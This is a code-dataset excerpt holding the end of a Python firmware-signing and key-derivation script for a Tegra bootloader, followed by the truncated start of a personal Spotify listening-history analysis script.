= exec_file(TegraOpenssl)\n pubkeyfile = 'v3_pub_keyhash'\n temp_copy = 0\n\n # pack the arguments\n if pkh and mont:\n if is_hsm():\n from tegrasign_v3_hsm import get_rsa_mod_hsm, get_rsa_mont_hsm\n return get_rsa_mod_hsm(p_key, pkh) and get_rsa_mont_hsm(p_key, mont)\n\n command.extend(['--isPkcKey', keyfilename, pkh, mont])\n elif pkh:\n if is_hsm():\n from tegrasign_v3_hsm import get_rsa_mod_hsm\n return get_rsa_mod_hsm(p_key, pkh)\n command.extend(['--isPkcKey', keyfilename, pkh])\n elif mont:\n if is_hsm():\n from tegrasign_v3_hsm import get_rsa_mont_hsm\n return get_rsa_mont_hsm(p_key, mont)\n\n command.extend(['--isPkcKey', keyfilename, pubkeyfile, mont])\n temp_copy = 1\n else:\n if is_hsm():\n from tegrasign_v3_hsm import get_rsa_mod_hsm\n return get_rsa_mod_hsm(p_key)\n command.extend(['--isPkcKey', keyfilename])\n\n ret_str = run_command(command)\n\n if temp_copy==1:\n os.remove(pubkeyfile)\n\n if not is_ret_ok(ret_str):\n return False\n\n # scan the return string for decimal value\n m = re.search('Key size is (\\d+)', ret_str)\n if m:\n p_key.keysize = int(m.group(1))\n if (p_key.keysize > 0) and (p_key.keysize < NV_RSA_MAX_KEY_SIZE):\n return True\n return False\n\ndef is_ECC_key(keyfilename, p_key, pkh):\n if is_hsm():\n return False #TODO: Not supported\n\n command = exec_file(TegraOpenssl)\n\n if pkh == None:\n command.extend(['--isEccKey', keyfilename])\n else:\n command.extend(['--isEccKey', keyfilename, pkh])\n\n ret_str = run_command(command)\n\n if is_ret_ok(ret_str):\n # See if the key is p521\n if '521' in ret_str:\n p_key.keysize = NV_ECC521_SIG_STRUCT_SIZE\n else:\n p_key.keysize = NV_ECC_SIG_STRUCT_SIZE\n return True\n return False\n\ndef is_ED25519_key(keyfilename, p_key, pkh):\n\n if is_hsm():\n from tegrasign_v3_hsm import get_ed25519_pub_hsm\n return get_ed25519_pub_hsm(p_key, pkh)\n\n command = exec_file(TegraOpenssl)\n\n if pkh == None:\n command.extend(['--isEd25519Key', keyfilename])\n else:\n command.extend(['--isEd25519Key', keyfilename, pkh])\n\n ret_str = run_command(command)\n if is_ret_ok(ret_str):\n p_key.keysize = ED25519_SIG_SIZE\n return True\n return False\n\ndef is_xmss_key(keyfilename, p_key, pkh):\n\n file_size = os.path.getsize(keyfilename)\n\n if (file_size == XMSS_KEY_SIZE):\n p_key.keysize = XMSS_KEY_SIZE\n info_print('Assuming XMSS key')\n pub_file = os.path.splitext(os.path.basename(keyfilename))[0] + '.pub'\n if pkh and check_file(pub_file):\n # Duplicating the file because we need to pass that back to the caller\n shutil.copyfile(pub_file, pkh)\n return True\n return False\n\ndef do_kdf_kdf2(kdk, kdd, label = None, context = None, HexLabel = False):\n\n msgStr = get_composed_msg(label,context, 256, HexLabel, True)\n\n internal = SignKey()\n if kdd == None:\n internal.key.aeskey = str_to_hex(kdk)\n else:\n internal.key.aeskey = str_to_hex(kdk+kdd)\n\n internal.keysize = len(internal.key.aeskey)\n msg = str_to_hex(msgStr)\n\n return do_hmac_sha256(msg, len(msg), internal)\n\ndef do_kdf_params_t234(dk, params, kdf_list):\n # Note some kdf is using string operation, some are hex operation\n is_hex = True\n is_str = False\n L = 256\n basic_params = params['BASIC']\n\n # Derive the key relationship: dk -> kdk -> *_dec_kdk\n dk_params = params['DK'][dk]\n dk_ctx = {\n 'KDK' : dk_params['KDK'],\n 'Label' : hex_to_str(kdf_list[KdfArg.DKSTR]), # Note this is passed in\n 'Context' : hex_to_str(kdf_list[KdfArg.DKVER]), # Note this is passed in\n }\n\n dk_ctx['Msg'] = get_composed_msg(dk_ctx['Label'], dk_ctx['Context'], L, is_hex)\n\n kdk_params = 
params['KDK'][dk_ctx['KDK']]\n kdk_to_use = kdk_params['KDK']\n kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : kdk_params[\"Label\"],\n }\n kdk_ctx['Msg'] = get_composed_msg(kdk_ctx['Label'], '', L, is_str)\n\n bl_dec_kdk_ctx = {}\n fw_dec_kdk_ctx = {}\n\n # Check if bl_dec_kdk is defined for this dk\n if '_ROM_DEC_KDK' not in kdk_to_use:\n bl_dec_kdk_params = params['DEC_KDK'][kdk_ctx['KDK']]\n kdk_to_use = bl_dec_kdk_params['KDK']\n bl_dec_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : hex_to_str(kdf_list[KdfArg.BLSTR]), # Note this is passed in\n }\n\n bl_dec_kdk_ctx['Msg'] = get_composed_msg(bl_dec_kdk_ctx['Label'], '', L, is_hex)\n\n # Check if fw_dec_kdk is defined for this dk\n if '_ROM_DEC_KDK' not in kdk_to_use:\n fw_dec_kdk_params = params['DEC_KDK'][bl_dec_kdk_ctx['KDK']]\n kdk_to_use = fw_dec_kdk_params['KDK']\n fw_dec_kdk_ctx = {\n \"KDK\" : kdk_to_use,\n \"Label\" : hex_to_str(kdf_list[KdfArg.FWSTR]), # Note this is passed in\n }\n\n fw_dec_kdk_ctx['Msg'] = get_composed_msg(fw_dec_kdk_ctx['Label'], '', L, is_hex)\n else:\n fw_dec_kdk_ctx['Msg'] = None\n\n else:\n bl_dec_kdk_ctx['Msg'] = None\n fw_dec_kdk_ctx['Msg'] = None\n\n dec_kdk_params = params['DEC_KDK'][kdk_to_use]\n\n dec_kdk_ctx = {\n 'KDK' : basic_params[dec_kdk_params['KDK']],\n 'KDD' : basic_params[dec_kdk_params['KDD']],\n 'Label' : dec_kdk_params['Label'],\n }\n\n dec_kdk_ctx[\"Msg\"] = get_composed_msg(dec_kdk_ctx['Label'], '', L, is_str)\n\n # Pop the elements that are no longer needed\n while (len(kdf_list) > KdfArg.FLAG):\n kdf_list.pop()\n\n return ([dec_kdk_ctx['KDK'] + dec_kdk_ctx['KDD'], dec_kdk_ctx[\"Msg\"],\n bl_dec_kdk_ctx[\"Msg\"], kdk_ctx[\"Msg\"], dk_ctx[\"Msg\"]])\n\ndef do_kdf(params_slist, kdf_list):\n base_name = script_dir + 'v3_kdf_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.tag'\n raw_file = open_file(raw_name, 'wb')\n\n # to write to file\n # order: sizes then data for: deckdk_kdkkdd, deckdk_msg, (bl_deckdk_msg), kdk_msg, dk_msg, iv, aad, tag, src, result_name\n\n for param in params_slist:\n if param == None:\n arr = int_2bytes(4, 0)\n else:\n arr = int_2bytes(4, len(str_to_hex(param)))\n write_file(raw_file, arr)\n\n for kdf in kdf_list:\n arr = int_2bytes(4, len(kdf))\n write_file(raw_file, arr)\n\n arr = int_2bytes(4, len(result_name) + 1)\n write_file(raw_file, arr)\n\n for param in params_slist:\n if param != None:\n write_file(raw_file, str_to_hex(param))\n\n for kdf in kdf_list:\n write_file(raw_file, kdf)\n\n write_file(raw_file, result_name.encode(\"utf-8\"))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--kdf', raw_name])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_dgst = result_fh.read()\n kdf_list[KdfArg.TAG] = buff_dgst[:]\n\n with open(raw_name, 'rb') as f:\n buff_data = bytearray(f.read())\n src_bytes = len(kdf_list[KdfArg.SRC])\n result_bytes = len(result_name) + 1\n payload_offset = len(buff_data) - src_bytes - result_bytes\n kdf_list[KdfArg.SRC] = buff_data[payload_offset:payload_offset+src_bytes]\n result_fh.close()\n os.remove(raw_name)\n os.remove(result_name)\n return True\n os.remove(raw_name)\n return False\n\ndef do_derive_dk(dk, params, kdf_list, p_key):\n dk_list = params['DK']\n\n if dk in dk_list:\n if p_key.kdf.chipid == '0x230':\n params_slist = do_kdf_params_t234(dk, params, kdf_list)\n else:\n from tegrasign_v3_nvkey_load import 
do_kdf_params\n return do_kdf_params(dk, params, kdf_list)\n\n return do_kdf(params_slist, kdf_list)\n raise tegrasign_exception('Can not derive %s' % (dk))\n\ndef do_kdf_params_oem(dk, params, kdf_list, p_key):\n # Note some kdf is using string operation, some are hex operation\n is_hex = True\n is_str = False\n L = 256\n basic_params = params['BASIC']\n\n dk_params = params['DK'][dk]\n dk_ctx = {\n \"KDK\" : dk_params['KDK'],\n 'Label' : p_key.kdf.label.get_strbuf(),\n 'Context' : p_key.kdf.context.get_strbuf(),\n }\n\n dk_ctx[\"Msg\"] = get_composed_msg(dk_ctx['Label'], dk_ctx['Context'], L, is_hex)\n\n kdk_params = params['KDK'][dk_ctx['KDK']]\n kdk_to_use = kdk_params['KDK']\n kdk_upstream = kdk_to_use\n kdk_ctx = {\n \"KDK\" : kdk_to_use,\n \"Label\" : kdk_params[\"Label\"],\n }\n\n kdk_ctx['Msg'] = get_composed_msg(kdk_ctx['Label'], '', L, is_str)\n bl_kdk_ctx = {}\n fw_kdk_ctx = {}\n gp_kdk_ctx = {}\n gpto_kdk_ctx = {}\n tz_kdk_ctx = {}\n bl_kdk_ctx['Msg'] = None\n fw_kdk_ctx['Msg'] = None\n gp_kdk_ctx['Msg'] = None\n gpto_kdk_ctx['Msg'] = None\n tz_kdk_ctx['Msg'] = None\n count = 5\n while kdk_to_use in ['SBK_NVMB_KDK', 'SBK_TZ_KDK', 'SBK_GP_KDK', 'SBK_GP_TOSB_KDK', 'SBK_FW_KDK'] and (count>0):\n # Check if sbk_bl_kdk is defined for this dk\n if 'SBK_NVMB_KDK' in kdk_to_use:\n bl_kdk_params = params['KDK'][kdk_to_use]\n kdk_to_use = bl_kdk_params['KDK']\n\n if p_key.kdf.chipid == '0x230':\n bl_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : p_key.kdf.bl_label.get_strbuf(),\n }\n bl_kdk_ctx['Msg'] = get_composed_msg(bl_kdk_ctx['Label'], '', L, is_hex)\n else:\n bl_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : bl_kdk_params['Label'],\n 'Context' : p_key.kdf.bl_label.get_strbuf(),\n }\n bl_kdk_ctx['Msg'] = get_composed_msg(bl_kdk_ctx['Label'], bl_kdk_ctx['Context'], L, False)\n\n elif 'SBK_TZ_KDK' in kdk_to_use:\n tz_kdk_params = params['KDK'][kdk_to_use]\n kdk_to_use = tz_kdk_params['KDK']\n tz_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : p_key.kdf.tz_label.get_strbuf()\n }\n\n tz_kdk_ctx['Msg'] = get_composed_msg(tz_kdk_ctx['Label'], '', L, is_hex)\n\n elif 'SBK_GP_KDK' in kdk_to_use:\n gp_kdk_params = params['KDK'][kdk_to_use]\n kdk_to_use = gp_kdk_params['KDK']\n gp_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : p_key.kdf.gp_label.get_strbuf()\n }\n\n gp_kdk_ctx['Msg'] = get_composed_msg(gp_kdk_ctx['Label'], '', L, is_hex)\n\n elif 'SBK_GP_TOSB_KDK' in kdk_to_use:\n gpto_kdk_params = params['KDK'][kdk_to_use]\n kdk_to_use = gpto_kdk_params['KDK']\n gpto_kdk_ctx = {\n 'KDK' : kdk_to_use,\n 'Label' : '544F5342', # 'TOSB'\n }\n\n gpto_kdk_ctx['Msg'] = get_composed_msg(gpto_kdk_ctx['Label'], '', L, is_hex)\n\n # Check if sbk_fw_kdk is defined for this dk\n elif 'SBK_FW_KDK' in kdk_to_use:\n fw_kdk_params = params['KDK'][kdk_to_use]\n kdk_to_use = fw_kdk_params['KDK']\n fw_kdk_ctx = {\n \"KDK\" : kdk_to_use,\n \"Label\" : p_key.kdf.fw_label.get_strbuf(),\n }\n\n fw_kdk_ctx['Msg'] = get_composed_msg(fw_kdk_ctx['Label'], '', L, is_hex)\n\n count = count - 1\n\n aes_params = params['AES'][kdk_to_use]\n aes_iv = manifest_xor_offset(basic_params[aes_params['IV']], aes_params[\"Offset\"])\n aes_aad = aes_params['Manifest'] + AAD_0_96\n aes_tag = bytes(16)\n\n dec_kdk_params = params['DEC_KDK'][aes_params['KDK']]\n\n dec_kdk_ctx = {\n 'KDK' : basic_params[dec_kdk_params['KDK']],\n 'KDD' : basic_params[dec_kdk_params['KDD']],\n \"Label\" : dec_kdk_params[\"Label\"],\n }\n\n dec_kdk_ctx[\"Msg\"] = get_composed_msg(dec_kdk_ctx['Label'], '', L, is_str)\n\n # Pop the elements that are no longer 
needed\n while (len(kdf_list) > KdfArg.DKSTR):\n kdf_list.pop()\n\n # Replace sbk key str if the sbk key file is found\n sbk_keystr = aes_params[\"Plain\"]\n if p_key.filename != None and os.path.exists(p_key.filename):\n with open(p_key.filename, 'rb') as f:\n key_buf = bytearray(f.read())\n if extract_AES_key(key_buf, p_key):\n sbk_keystr = hex_to_str(p_key.key.aeskey)\n\n return [dec_kdk_ctx['KDK'] + dec_kdk_ctx['KDD'], aes_iv, aes_aad, sbk_keystr, dec_kdk_ctx['Msg'],\n bl_kdk_ctx['Msg'], tz_kdk_ctx['Msg'], gp_kdk_ctx['Msg'], gpto_kdk_ctx['Msg'], kdk_ctx['Msg'], dk_ctx['Msg']]\n\ndef do_kdf_oem(params_slist, kdf_list, blockSize):\n if is_hsm():\n from tegrasign_v3_hsm import do_kdf_oem_hsm\n p_key = SignKey()\n p_key.hsm.type = KeyType.SBK\n p_key.kdf.flag = kdf_list[KdfArg.FLAG]\n p_key.kdf.iv.set_buf(kdf_list[KdfArg.IV])\n p_key.kdf.aad.set_buf(kdf_list[KdfArg.AAD])\n p_key.kdf.tag.set_buf(kdf_list[KdfArg.TAG])\n p_key.src_buf = kdf_list[KdfArg.SRC]\n p_key.block_size = int(blockSize)\n if do_kdf_oem_hsm(params_slist, p_key) == True:\n kdf_list[KdfArg.SRC] = p_key.src_buf\n kdf_list[KdfArg.TAG] = p_key.kdf.tag.get_hexbuf()\n return True\n return False\n\n base_name = script_dir + 'v3_aeskdf_' + pid\n raw_name = base_name + '.raw'\n result_name = base_name + '.tag'\n raw_file = open_file(raw_name, 'wb')\n\n # to write to file\n # order: sizes then data for: deckdk_kdkkdd, deckdk_iv, deckdk_aad, deckdk_plain, deckdk_msg, tzkdk_msg, gpkdk_msg,\n # gptokdk_msg, kdk_msg, dk_msg, iv, aad, tag, src, flag, result_name\n\n for param in params_slist:\n if param == None:\n arr = int_2bytes(4, 0)\n else:\n arr = int_2bytes(4, len(str_to_hex(param)))\n write_file(raw_file, arr)\n\n for kdf in kdf_list:\n arr = int_2bytes(4, len(kdf))\n write_file(raw_file, arr)\n\n arr = int_2bytes(4, len(result_name) + 1)\n write_file(raw_file, arr)\n\n for param in params_slist:\n if param != None:\n write_file(raw_file, str_to_hex(param))\n\n for kdf in kdf_list:\n if (type(kdf) == str) and (len(kdf) == 1): # handles flag that is a 1-char str\n arr = int_2bytes(1, ord(kdf))\n write_file(raw_file, arr)\n else:\n write_file(raw_file, kdf)\n\n write_file(raw_file, result_name.encode(\"utf-8\"))\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n write_file(raw_file, nullarr)\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--kdfoem', raw_name])\n if blockSize != \"0\":\n command.extend(['--block', str(blockSize)])\n\n ret_str = run_command(command)\n\n if check_file(result_name):\n result_fh = open_file(result_name, 'rb')\n buff_dgst = result_fh.read()\n kdf_list[KdfArg.TAG] = buff_dgst[:]\n\n with open(raw_name, 'rb') as f:\n buff_data = bytearray(f.read())\n src_bytes = len(kdf_list[KdfArg.SRC])\n flg_bytes = len(kdf_list[KdfArg.FLAG])\n result_bytes = len(result_name) + 1\n payload_offset = len(buff_data) - src_bytes - result_bytes - flg_bytes\n kdf_list[KdfArg.SRC] = buff_data[payload_offset:payload_offset+src_bytes]\n result_fh.close()\n os.remove(result_name)\n os.remove(raw_name)\n return True\n os.remove(raw_name)\n return False\n\ndef do_derive_dk_oem(dk, params, kdf_list, p_key, blockSize):\n dk_list = params['DK']\n\n if dk in dk_list:\n params_slist = do_kdf_params_oem(dk, params, kdf_list, p_key)\n\n return do_kdf_oem(params_slist, kdf_list, blockSize)\n raise tegrasign_exception('Can not derive %s' % (dk))\n\ndef map_bin_to_dk_oem(p_key, params):\n if p_key.kdf.dk != None:\n return p_key.kdf.dk\n enc_file = p_key.src_file\n magicid = p_key.kdf.magicid\n 
basename = os.path.splitext(os.path.basename(enc_file))[0].lower()\n    ext = os.path.splitext(os.path.basename(enc_file))[1].lower()\n\n    if 'bpmp' in basename and 'ist' in basename:\n        return 'SBK_BPMP_IST_DK'\n\n    if ('bpmp' in basename) and ('.dtb' == ext):\n        return 'SBK_BPMP_DTB_DK'\n\n    if 'ape' in basename:\n        return 'SBK_APE_DK'\n\n    if 'applet' in basename:\n        return 'SBK_BPMP_MB2_DK'\n\n    if 'bpmp' in basename:\n        return 'SBK_BPMP_FW_DK'\n\n    if 'br_bct' in basename:\n        return 'SBK_BCT_DK'\n\n    if 'cpurf' in basename:\n        return 'SBK_MB2_RF_DK'\n\n    if 'dce' in basename:\n        return 'SBK_DCE_DK'\n\n    if 'eks' in basename:\n        return 'SBK_EKS_DK'\n\n    if 'fsi' in basename:\n        return 'SBK_FSI_DK'\n\n    if 'ist' in basename and 'config' in basename: # This is IST-CONFIG\n        return 'SBK_IST_CONFIG_DK'\n\n    if 'ist' in basename and 'ucode' in basename: # This is IST-UCODE (Key ON/OFF IST)\n        return 'SBK_IST_UCODE_DK'\n\n    if 'oist' in basename and 'ucode' in basename: # This is CCPLEX-IST-UCODE\n        return 'SBK_CCPLEX_IST_DK'\n\n    if 'mb1_bct' in basename or ('mb1' in basename and 'bct' in basename):\n        return 'SBK_MB1BCT_DK'\n\n    if 'mb1' in basename:\n        return 'SBK_MB1_DK'\n\n    if 'mb2_bct' in basename:\n        return 'SBK_MB2BCT_DK'\n\n    if 'mb2' in basename:\n        return 'SBK_MB2_DK'\n\n    if 'mce' in basename:\n        return 'SBK_MCE_DK'\n\n    if 'mem' in basename and ('.bct' == ext):\n        if '0' in basename:\n            return 'SBK_MEMBCT0_DK'\n        elif '1' in basename:\n            return 'SBK_MEMBCT1_DK'\n        elif '2' in basename:\n            return 'SBK_MEMBCT2_DK'\n        elif '3' in basename:\n            return 'SBK_MEMBCT3_DK'\n\n    if 'nvdec' in basename:\n        return 'SBK_NVDEC_DK'\n\n    if 'psc_bl' in basename:\n        return 'SBK_BL1_DK'\n\n    if 'pscfw' in basename:\n        return 'SBK_PSCFW_PKG_DK'\n\n    if 'psc_rf' in basename:\n        return 'SBK_PSC_RF_DK'\n\n    if 'rce' in basename:\n        return 'SBK_RCE_DK'\n\n    if 'sc7' in basename:\n        return 'SBK_SC7_RF_DK'\n\n    if 'sce' in basename:\n        return 'SBK_SCE_DK'\n\n    if 'spe' in basename:\n        return 'SBK_SPE_DK'\n\n    if 'tz' in basename and 'vault' in basename:\n        return 'SBK_TZ_VAULT_DK'\n\n    if 'tos' in basename:\n        return 'SBK_TOSB_DK'\n\n    if 'tsec' in basename:\n        return 'SBK_TSEC_DK'\n\n    # both substrings must be tested; a bare 'uefi' operand is always truthy\n    if 'uefi' in basename and 'jetson' in basename:\n        return 'SBK_CPU_BL_DK'\n\n    if 'xusb' in basename:\n        return 'SBK_XUSB_DK'\n\n    if 'os' in basename or 'hv' in basename:\n        return 'SBK_OS_DK'\n\n    if magicid != None:\n        # To find the DK for this magic id\n        kdk_params = params.get('KDK')\n        dk_params = params.get('DK')\n        for kdk in kdk_params:\n            kdk_val = kdk_params.get(kdk)\n            if len(kdk_val) == 1:\n                continue\n            if kdk_val['Label'] == magicid:\n                for dk in dk_params:\n                    if (kdk == dk_params.get(dk)['KDK']):\n                        return dk\n    raise tegrasign_exception('Cannot identify the key choice for %s' % (enc_file))\n\ndef load_params_oem(p_key):\n    chipid = p_key.kdf.chipid\n    if p_key.kdf.chipid == '0x230':\n        import yaml\n        cfg_file = 'tegrasign_v3_oemkey.yaml'\n        if os.path.exists(cfg_file) == False:\n            cfg_file = script_dir + 'tegrasign_v3_oemkey.yaml'\n        with open(cfg_file) as f:\n            params = yaml.safe_load(f)\n        dk = map_bin_to_dk_oem(p_key, params['DER_OEM'][chipid])\n        return dk, params['DER_OEM'][chipid]\n\n    else:\n        from tegrasign_v3_nvkey_load import load_params_oem_stage\n        params = load_params_oem_stage(p_key)\n        dk = map_bin_to_dk_oem(p_key, params)\n        return dk, params\n\ndef do_derive_cbc(p_key):\n    # Note: some KDFs use string operations\n    is_hex = False\n    L = 128 # key length in bits\n\n    p_key.kdf.get_composed_msg(L, is_hex, is_hex)\n\n    current_dir_path = os.path.dirname(os.path.realpath(__file__)) + '/'\n    base_name = 
current_dir_path + 'v3_kdfcbc_'\n raw_name = base_name + '.raw'\n raw_file = open_file(raw_name, 'wb')\n filename = p_key.src_file\n\n result_name = os.path.splitext(filename)[0] + '_encrypt' + os.path.splitext(filename)[1]\n\n # to write to file\n # order: sizes then data for: msg, iv, src, result_name\n kdf_list = [p_key.kdf.get_hexmsg(), p_key.key.aeskey, p_key.kdf.iv.get_hexbuf(), p_key.get_sign_buf()]\n\n for kdf in kdf_list:\n if kdf == None:\n arr = int_2bytes(4, 0)\n else:\n arr = int_2bytes(4, len(kdf))\n write_file(raw_file, arr)\n\n arr = int_2bytes(4, len(result_name) + 1)\n write_file(raw_file, arr)\n\n for kdf in kdf_list:\n if kdf != None:\n write_file(raw_file, kdf)\n\n nullarr = bytearray(1)\n nullarr[0] = 0 # need this null for char*\n\n write_file(raw_file, result_name.encode(\"utf-8\"))\n write_file(raw_file, nullarr)\n raw_file.close()\n\n command = exec_file(TegraOpenssl)\n command.extend(['--kdfcbc', raw_name])\n\n ret_str = run_command(command)\n os.remove(raw_name)\n\n if check_file(result_name):\n return True\n return False\n\ndef do_random(p_key):\n if is_hsm():\n from tegrasign_v3_hsm import do_random_hsm\n do_random_hsm(p_key)\n else:\n p_key.ran.buf = bytearray(p_key.ran.size * p_key.ran.count)\n for i in range(p_key.ran.count):\n buf = random_gen(p_key.ran.size)\n start = i * p_key.ran.size\n p_key.ran.buf[start:start+p_key.ran.size] = buf[:]\n info_print('Generated random strings: %s ' %(hex_to_str(p_key.ran.buf)))\n\n if p_key.filename != 'Unknown':\n with open(p_key.filename, \"wb\") as f:\n f.write(p_key.ran.buf)\n\ndef do_derive_hmacsha(p_key):\n if is_hsm():\n from tegrasign_v3_hsm import do_derive_hmacsha_hsm\n buff_hash = do_derive_hmacsha_hsm(p_key.get_sign_buf(), p_key)\n else:\n key = do_kdf_kdf2(hex_to_str(p_key.key.aeskey), None, p_key.kdf.label.get_strbuf(), p_key.kdf.context.get_strbuf(), True)\n backup = p_key\n backup.key.aeskey = key\n buff_hash = do_hmac_sha256(p_key.get_sign_buf(), p_key.len, backup)\n\n # save hash to *.hash file\n hash_file_name = os.path.splitext(p_key.src_file)[0] + '.hash'\n with open(hash_file_name, \"wb\") as f:\n f.write(buff_hash)\n\ndef do_derive_aesgcm(p_key, internal):\n if is_hsm():\n from tegrasign_v3_hsm import do_derive_aesgcm_hsm\n buff_enc = do_derive_aesgcm_hsm(p_key.get_sign_buf(), p_key)\n else:\n key = do_kdf_kdf2(hex_to_str(p_key.key.aeskey), None, p_key.kdf.label.get_strbuf(), p_key.kdf.context.get_strbuf(), True)\n backup = p_key\n backup.key.aeskey = key\n buff_enc = do_aes_gcm(p_key.get_sign_buf(), p_key.len, backup, internal[\"--iv\"], internal[\"--aad\"], internal[\"--tag\"],\n internal[\"--verify\"], internal[\"--verbose\"])\n\n with open(p_key.src_file, 'rb') as f:\n buff_data = bytearray(f.read())\n\n buff_data = buff_data[0:p_key.off] + buff_enc + buff_data[p_key.off + p_key.len:]\n\n enc_file_name = os.path.splitext(p_key.src_file)[0] + '_encrypt' + os.path.splitext(p_key.src_file)[1]\n with open(enc_file_name, 'wb') as f:\n f.write(buff_data)\n\n tag_file_name = os.path.splitext(p_key.src_file)[0] + '.tag'\n with open(tag_file_name, 'wb') as f:\n f.write(p_key.kdf.tag.get_hexbuf())\n\n'''\nPerform key operation and pad back values for tag & src if successful\n'''\ndef do_key_derivation(p_key, kdf_list, blockSize):\n try:\n info_print('Perform key derivation on ' + p_key.src_file)\n\n if (kdf_list[KdfArg.FLAG] <= DerKey.NVPDS):\n from tegrasign_v3_nvkey_load import load_params\n dk, params = load_params(p_key)\n return do_derive_dk(dk, params, kdf_list, p_key)\n else:\n dk, params = 
load_params_oem(p_key)\n return do_derive_dk_oem(dk, params, kdf_list, p_key, blockSize)\n\n except ImportError as e:\n raise tegrasign_exception('Please check setup. Could not find ' + str(e))\n\n except Exception as e:\n info_print(traceback.format_exc())\n raise tegrasign_exception(\"Unknown %s requested for key derivation encryption. Error %s\" %(p_key.src_file, str(e)))\n","repo_name":"zbwu/athena_l4t_sdk","sub_path":"bootloader/tegrasign_v3_internal.py","file_name":"tegrasign_v3_internal.py","file_ext":"py","file_size_in_byte":57971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"43027727346","text":"import time\r\n\r\nstart_time = time.time()\r\nimport os\r\nimport json\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pymysql\r\nimport sqlalchemy\r\nimport spotipy\r\nimport spotipy.util as util\r\nimport re\r\nfrom datetime import datetime\r\nimport pprint\r\n\r\nwith open(r'File_Location', encoding = 'utf8') as j:\r\n playlist_dict = json.loads(j.read())\r\nstreaming_0 = pd.read_json(r'File_Location')\r\nstreaming_1 = pd.read_json(r'File_Location')\r\nstreaming = pd.concat([streaming_0, streaming_1], axis = 0, join = \"outer\")\r\nstreaming[\"combinedArtistSong\"] = streaming[\"trackName\"] + \" - \" + streaming[\"artistName\"]\r\nstreaming = streaming.reset_index(drop=True)\r\n\r\n#Rearranging playlist dictionary\r\n\r\nplaylist_names = []\r\nfor playlist in range(len(playlist_dict['playlists'])):\r\n playlist_names.append(playlist_dict['playlists'][playlist]['name'])\r\nplaylist_names = pd.DataFrame(playlist_names)\r\n\r\nplaylist_songs = pd.DataFrame([])\r\nfor playlist in range(len(playlist_dict['playlists'])):\r\n try:\r\n track_list_i = playlist_dict['playlists'][playlist].get('items')\r\n track_list_i = pd.DataFrame(track_list_i)['track']\r\n track_list_i = pd.DataFrame(track_list_i.tolist())\r\n track_list_i[\"Playlist\"] = playlist_names.iloc[playlist]\r\n track_list_i[\"Playlist\"] = track_list_i[\"Playlist\"].fillna(method=\"ffill\")\r\n playlist_songs = pd.concat([playlist_songs, track_list_i], axis=0, join='outer')\r\n except:\r\n pass\r\n\r\nplaylist_songs = playlist_songs.drop(playlist_songs.columns[[5]], axis = 1)\r\nplaylist_songs = playlist_songs.dropna()\r\nplaylist_songs = playlist_songs.reset_index(drop=True)\r\n\r\n#Authentication\r\nclient_id = 'XXXXXXX'\r\nclient_secret = 'XXXXXXX'\r\nusername = \"griffin_sleigh\"\r\nscope = \"user-read-currently-playing user-read-recently-played\"\r\nredirect_uri = \"http://localhost:8888/callback/\"\r\n\r\ntoken = util.prompt_for_user_token(username, scope, client_id = client_id, client_secret = client_secret, redirect_uri = redirect_uri)\r\nsp = spotipy.Spotify(auth=token)\r\n\r\nuri_df = pd.DataFrame([])\r\nfor track in range(len(playlist_songs)):\r\n try:\r\n uri = playlist_songs.at[track, 'trackUri']\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index = [track])\r\n track_info['track_image'] = sp.track(uri, market = 'AU')['album']['images'][0]['url']\r\n track_info['track_url'] = sp.track(uri, market = 'AU')['external_urls']['spotify']\r\n uri_df = pd.concat([uri_df, track_info], axis = 0)\r\n except:\r\n token = util.prompt_for_user_token(username, scope, client_id=client_id, client_secret=client_secret,redirect_uri=redirect_uri)\r\n sp = spotipy.Spotify(auth=token)\r\n uri = playlist_songs.at[track, 'trackUri']\r\n track_info = pd.DataFrame(sp.audio_features(uri)[0], index = [track])\r\n track_info['track_image'] = sp.track(uri, market = 
'AU')['album']['images'][0]['url']\r\n track_info['track_url'] = sp.track(uri, market = 'AU')['external_urls']['spotify']\r\n uri_df = pd.concat([uri_df, track_info], axis = 0)\r\n\r\nplaylist_songs = pd.concat([playlist_songs, uri_df], axis = 1)\r\nplaylist_songs[\"combinedArtistSong\"] = playlist_songs[\"trackName\"] + \" - \" + playlist_songs[\"artistName\"]\r\nplaylist_songs['countPlayed'] = \"\"\r\n\r\n#Adding some elements to playlist_songs from streaming\r\nlast_date = datetime.strptime(max(streaming[\"endTime\"]), \"%Y-%m-%d %H:%M\")\r\n\r\nfor song in range(len(playlist_songs)):\r\n comb_artist_song = re.escape(playlist_songs.at[song, \"combinedArtistSong\"])\r\n playlist_songs.at[song, 'countPlayed'] = streaming['combinedArtistSong'].str.count(comb_artist_song).sum()\r\n first_played_row = streaming['combinedArtistSong'].str.contains(comb_artist_song).idxmax()\r\n first_played_date = datetime.strptime(streaming.at[first_played_row, \"endTime\"], \"%Y-%m-%d %H:%M\")\r\n playlist_songs.at[song, 'daysSinceFirstPlayed'] = (last_date - first_played_date).days\r\n\r\n#transpose playlist_songs for spider chart\r\nplaylist_songs_transposing = playlist_songs[[\"combinedArtistSong\", \"acousticness\", \"danceability\", \"energy\", \"liveness\", \"loudness\", \"speechiness\", \"valence\"]]\r\n\r\nstreaming_size = pd.DataFrame(streaming.groupby(\"combinedArtistSong\").size(), columns = [\"plays\"])\r\nstreaming_first_dates = pd.DataFrame(streaming.groupby(\"combinedArtistSong\").first())\r\nstreaming_first_dates[\"endTime\"] = streaming_first_dates[\"endTime\"].apply(lambda x:datetime.strptime(x,\"%Y-%m-%d %H:%M\"))\r\nstreaming_grouped = 